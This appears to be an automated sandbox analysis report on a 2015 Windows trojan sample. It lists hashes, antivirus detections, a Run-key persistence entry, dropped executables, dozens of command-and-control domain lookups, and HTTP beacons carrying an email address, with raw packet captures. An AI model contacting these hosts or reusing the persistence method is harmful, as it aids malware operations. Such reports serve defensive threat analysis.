Analysis Date2015-08-27 05:18:33
MD567e50e7fcd9a4aaacd773e49b2a703ab
SHA1e1a387a69d8e8b3e8bcf7bee8282e34eea8d63be

Static Details:

File typePE32 executable for MS Windows (GUI) Intel 80386 32-bit
Section.text md5: 6a4c940cd05aeccb27b685dbfeda3179 sha1: 04515d8d55839703198a7abc01f59f9508da2b8a size: 293376
Section.rdata md5: d07b49505e056415d97c37a7d8ff8d2e sha1: 6fe2bbe6363af6599739564c855228dad29b75fa size: 34304
Section.data md5: 970ac531ed74e941560292d89fb11e01 sha1: 3311096ef44f749d9923332801e4bd1b5ae30d33 size: 94208
Timestamp2014-10-30 09:48:57
PackerMicrosoft Visual C++ ?.?
PEhash0540d536b7c7228de96cc76a1bcdd8da1a6d4d40
IMPhash27804559539e81eeddd79bbef120a6fc
AVCA (E-Trust Ino)no_virus
AVF-SecureGen:Variant.Symmi.22722
AVDr. WebTrojan.DownLoader15.29683
AVClamAVno_virus
AVArcabit (arcavir)Gen:Variant.Symmi.22722
AVBullGuardGen:Variant.Symmi.22722
AVPadvishno_virus
AVVirusBlokAda (vba32)no_virus
AVCAT (quickheal)Trojan.Dynamer.AC3
AVTrend MicroTSPY_NIVDORT.SMB
AVKasperskyTrojan.Win32.Generic
AVZillya!no_virus
AVEmsisoftGen:Variant.Symmi.22722
AVIkarusTrojan.FBAccountLock
AVFrisk (f-prot)no_virus
AVAuthentiumW32/Wonton.B.gen!Eldorado
AVMalwareBytesTrojan.Zbot.WHE
AVMicroWorld (escan)Gen:Variant.Symmi.22722
AVMicrosoft Security EssentialsTrojanSpy:Win32/Nivdort.BD
AVK7Trojan ( 004cb2771 )
AVBitDefenderGen:Variant.Symmi.22722
AVFortinetW32/Agent.VNC!tr
AVSymantecDownloader.Upatre!g15
AVGrisoft (avg)Win32/Cryptor
AVEset (nod32)Win32/Agent.VNC
AVAlwil (avast)Downloader-TLD [Trj]
AVAd-AwareGen:Variant.Symmi.22722
AVTwisterTrojan.Agent.VNC.aanx.mg
AVAvira (antivir)BDS/Zegost.Gen4
AVMcafeeTrojan-FEMT!67E50E7FCD9A
AVRising0x580445a0

Runtime Details:

Screenshot

Process
↳ C:\malware.exe

RegistryHKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Run\Video BranchCache DLL Offline Network ➝
C:\Documents and Settings\Administrator\Application Data\syodwtlvldr\ssvpbhcutyqc.exe
Creates FileC:\Documents and Settings\Administrator\Application Data\syodwtlvldr\ssvpbhcutyqc.exe
Creates ProcessC:\Documents and Settings\Administrator\Application Data\syodwtlvldr\ssvpbhcutyqc.exe

Process
↳ C:\Documents and Settings\Administrator\Application Data\syodwtlvldr\ssvpbhcutyqc.exe

Creates FileC:\Documents and Settings\Administrator\Application Data\syodwtlvldr\baxuvpcls.exe
Creates File\Device\Afd\Endpoint
Creates FileC:\Documents and Settings\Administrator\Application Data\syodwtlvldr\ssvpbhcutyqc.lmrti
Creates ProcessWATCHDOGPROC "C:\Documents and Settings\Administrator\Application Data\syodwtlvldr\ssvpbhcutyqc.exe"

Process
↳ WATCHDOGPROC "C:\Documents and Settings\Administrator\Application Data\syodwtlvldr\ssvpbhcutyqc.exe"

Network Details:

DNSsimplechoose.net
Type: A
123.108.108.168
DNSpossibleperiod.net
Type: A
192.64.119.216
DNSfinishperiod.net
Type: A
50.63.202.32
DNSseveradifference.net
Type: A
95.211.230.75
DNSprobablystorm.net
Type: A
DNSsweetthrown.net
Type: A
DNSprobablythrown.net
Type: A
DNSseveralhunger.net
Type: A
DNSmaterialhunger.net
Type: A
DNSseveraltraining.net
Type: A
DNSmaterialtraining.net
Type: A
DNSseveralstorm.net
Type: A
DNSmaterialstorm.net
Type: A
DNSseveralthrown.net
Type: A
DNSmaterialthrown.net
Type: A
DNSseverachoose.net
Type: A
DNSlaughchoose.net
Type: A
DNSseveraalthough.net
Type: A
DNSlaughalthough.net
Type: A
DNSseveraperiod.net
Type: A
DNSlaughperiod.net
Type: A
DNSseverahowever.net
Type: A
DNSlaughhowever.net
Type: A
DNSmotherchoose.net
Type: A
DNSsimplealthough.net
Type: A
DNSmotheralthough.net
Type: A
DNSsimpleperiod.net
Type: A
DNSmotherperiod.net
Type: A
DNSsimplehowever.net
Type: A
DNSmotherhowever.net
Type: A
DNSmountainchoose.net
Type: A
DNSpossiblechoose.net
Type: A
DNSmountainalthough.net
Type: A
DNSpossiblealthough.net
Type: A
DNSmountainperiod.net
Type: A
DNSmountainhowever.net
Type: A
DNSpossiblehowever.net
Type: A
DNSperhapschoose.net
Type: A
DNSwindowchoose.net
Type: A
DNSperhapsalthough.net
Type: A
DNSwindowalthough.net
Type: A
DNSperhapsperiod.net
Type: A
DNSwindowperiod.net
Type: A
DNSperhapshowever.net
Type: A
DNSwindowhowever.net
Type: A
DNSwinterchoose.net
Type: A
DNSsubjectchoose.net
Type: A
DNSwinteralthough.net
Type: A
DNSsubjectalthough.net
Type: A
DNSwinterperiod.net
Type: A
DNSsubjectperiod.net
Type: A
DNSwinterhowever.net
Type: A
DNSsubjecthowever.net
Type: A
DNSfinishchoose.net
Type: A
DNSleavechoose.net
Type: A
DNSfinishalthough.net
Type: A
DNSleavealthough.net
Type: A
DNSleaveperiod.net
Type: A
DNSfinishhowever.net
Type: A
DNSleavehowever.net
Type: A
DNSsweetchoose.net
Type: A
DNSprobablychoose.net
Type: A
DNSsweetalthough.net
Type: A
DNSprobablyalthough.net
Type: A
DNSsweetperiod.net
Type: A
DNSprobablyperiod.net
Type: A
DNSsweethowever.net
Type: A
DNSprobablyhowever.net
Type: A
DNSseveralchoose.net
Type: A
DNSmaterialchoose.net
Type: A
DNSseveralalthough.net
Type: A
DNSmaterialalthough.net
Type: A
DNSseveralperiod.net
Type: A
DNSmaterialperiod.net
Type: A
DNSseveralhowever.net
Type: A
DNSmaterialhowever.net
Type: A
DNSseverasingle.net
Type: A
DNSlaughsingle.net
Type: A
DNSseveracharge.net
Type: A
DNSlaughcharge.net
Type: A
DNSlaughdifference.net
Type: A
DNSseveraevery.net
Type: A
DNSlaughevery.net
Type: A
DNSsimplesingle.net
Type: A
DNSmothersingle.net
Type: A
HTTP GEThttp://simplechoose.net/index.php?email=celine@deltachems.com&method=post&len
User-Agent:
HTTP GEThttp://possibleperiod.net/index.php?email=celine@deltachems.com&method=post&len
User-Agent:
HTTP GEThttp://finishperiod.net/index.php?email=celine@deltachems.com&method=post&len
User-Agent:
HTTP GEThttp://severadifference.net/index.php?email=celine@deltachems.com&method=post&len
User-Agent:
Flows TCP192.168.1.1:1031 ➝ 123.108.108.168:80
Flows TCP192.168.1.1:1032 ➝ 192.64.119.216:80
Flows TCP192.168.1.1:1033 ➝ 50.63.202.32:80
Flows TCP192.168.1.1:1034 ➝ 95.211.230.75:80

Raw Pcap
0x00000000 (00000)   47455420 2f696e64 65782e70 68703f65   GET /index.php?e
0x00000010 (00016)   6d61696c 3d63656c 696e6540 64656c74   mail=celine@delt
0x00000020 (00032)   61636865 6d732e63 6f6d266d 6574686f   achems.com&metho
0x00000030 (00048)   643d706f 7374266c 656e2048 5454502f   d=post&len HTTP/
0x00000040 (00064)   312e300d 0a416363 6570743a 202a2f2a   1.0..Accept: */*
0x00000050 (00080)   0d0a436f 6e6e6563 74696f6e 3a20636c   ..Connection: cl
0x00000060 (00096)   6f73650d 0a486f73 743a2073 696d706c   ose..Host: simpl
0x00000070 (00112)   6563686f 6f73652e 6e65740d 0a0d0a     echoose.net....

0x00000000 (00000)   47455420 2f696e64 65782e70 68703f65   GET /index.php?e
0x00000010 (00016)   6d61696c 3d63656c 696e6540 64656c74   mail=celine@delt
0x00000020 (00032)   61636865 6d732e63 6f6d266d 6574686f   achems.com&metho
0x00000030 (00048)   643d706f 7374266c 656e2048 5454502f   d=post&len HTTP/
0x00000040 (00064)   312e300d 0a416363 6570743a 202a2f2a   1.0..Accept: */*
0x00000050 (00080)   0d0a436f 6e6e6563 74696f6e 3a20636c   ..Connection: cl
0x00000060 (00096)   6f73650d 0a486f73 743a2070 6f737369   ose..Host: possi
0x00000070 (00112)   626c6570 6572696f 642e6e65 740d0a0d   bleperiod.net...
0x00000080 (00128)   0a                                    .

0x00000000 (00000)   47455420 2f696e64 65782e70 68703f65   GET /index.php?e
0x00000010 (00016)   6d61696c 3d63656c 696e6540 64656c74   mail=celine@delt
0x00000020 (00032)   61636865 6d732e63 6f6d266d 6574686f   achems.com&metho
0x00000030 (00048)   643d706f 7374266c 656e2048 5454502f   d=post&len HTTP/
0x00000040 (00064)   312e300d 0a416363 6570743a 202a2f2a   1.0..Accept: */*
0x00000050 (00080)   0d0a436f 6e6e6563 74696f6e 3a20636c   ..Connection: cl
0x00000060 (00096)   6f73650d 0a486f73 743a2066 696e6973   ose..Host: finis
0x00000070 (00112)   68706572 696f642e 6e65740d 0a0d0a0d   hperiod.net.....
0x00000080 (00128)   0a                                    .

0x00000000 (00000)   47455420 2f696e64 65782e70 68703f65   GET /index.php?e
0x00000010 (00016)   6d61696c 3d63656c 696e6540 64656c74   mail=celine@delt
0x00000020 (00032)   61636865 6d732e63 6f6d266d 6574686f   achems.com&metho
0x00000030 (00048)   643d706f 7374266c 656e2048 5454502f   d=post&len HTTP/
0x00000040 (00064)   312e300d 0a416363 6570743a 202a2f2a   1.0..Accept: */*
0x00000050 (00080)   0d0a436f 6e6e6563 74696f6e 3a20636c   ..Connection: cl
0x00000060 (00096)   6f73650d 0a486f73 743a2073 65766572   ose..Host: sever
0x00000070 (00112)   61646966 66657265 6e63652e 6e65740d   adifference.net.
0x00000080 (00128)   0a0d0a                                ...


Strings